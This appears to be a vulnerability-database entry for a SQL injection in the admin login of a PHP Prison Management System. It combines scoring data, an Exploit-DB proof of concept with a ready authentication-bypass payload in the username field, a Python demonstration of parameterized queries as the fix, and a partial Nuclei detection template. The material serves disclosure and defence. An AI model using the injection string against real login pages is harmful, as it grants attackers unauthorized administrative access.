CVE-2024-33288
Published 2026-05-08
CVE-2024-33288: Prison Management System Using PHP v1.0 was discovered to contain a SQL injection vulnerability via the username on the Admin login page.
Priority: P3 51 | Severity: high | CVSS 3.1: 7.3
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
EXPLOIT
EPSS: 0.81% (52.3th percentile)
No detection rules found.
Exploit-DB
Prison Management System - SQL Injection Authentication Bypass
exploitdb·2024-05-13
---
# Exploit: Prison Management System Using PHP - SQL Injection Authentication Bypass
# Date: 15/03/2024
# Exploit Author: Sanjay Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sql/17287/prison-management-system.html
# Tested on: Windows, XAMPP
# CVE: CVE-2024-33288
# Proof of Concept:
Step 1 - Visit http://localhost/prison/
Step 2 - Click on the Admin Dashboard button, which redirects to the login page.
Step 3 - Enter username as admin' or '1'='1 and password as 123456
Step 4 - Click Sign In and now you will be logged in as admin.
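
Why the username in Step 3 makes the password irrelevant, and how a parameterized query closes the hole, as an added example (not code from the advisory or from the application). The table schema, the query shape and the sample credentials are assumptions, and SQLite stands in for the application's MySQL backend.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the admin table (assumed schema; plaintext
    # passwords only to keep the sketch short).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO admin (username, password) VALUES (?, ?)",
                   [("admin", "S3cret-constructed"), ("warden", "other-constructed")])
    return db

def build_concat_query(username, password):
    # Vulnerable pattern: user input is pasted into the SQL text.
    return ("SELECT username FROM admin WHERE username='" + username +
            "' AND password='" + password + "'")

def login_concat(db, username, password):
    row = db.execute(build_concat_query(username, password)).fetchone()
    return row[0] if row else None

def login_param(db, username, password):
    # Hardened pattern: placeholders keep input as data, never as SQL syntax.
    row = db.execute("SELECT username FROM admin WHERE username=? AND password=?",
                     (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    user, pw = "admin' or '1'='1", "123456"  # values from the PoC steps above
    print(build_concat_query(user, pw))
    # AND binds tighter than OR, so the WHERE clause is evaluated as
    #   username='admin' OR ('1'='1' AND password='123456')
    # and the admin row matches whatever password was typed.
    print("concatenated :", login_concat(db, user, pw))
    print("parameterized:", login_param(db, user, pw))
    print("valid login  :", login_param(db, "admin", "S3cret-constructed"))
```

In the PHP application the equivalent of `login_param` is a prepared statement (mysqli or PDO) with bound parameters for both fields.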
Nuclei
Prison Management System - SQL Injection Authentication Bypass
nuclei
A SQL injection vulnerability was found on the login page of Prison Management System.
Template:
id: CVE-2024-33288
info:
  name: Prison Management System - SQL Injection Authentication Bypass
  author: s4e-io
  severity: high
  description: |
    Sql injection vulnerability was found on the login page in Prison Management System
  impact: |
    Attackers can bypass authentication via SQL injection to gain unauthorized administrative access to the Prison Management System.
  remediation: |
    Apply security patches for Prison Management System addressing SQL injection vulnerabilities.
  reference:
    - https://en.0day.today/exploit/39610
    - https://www.sourcecodester.com/sql/17287/prison-management-system.html
  classification:
    cpe: cpe:2.3:a:prison_managem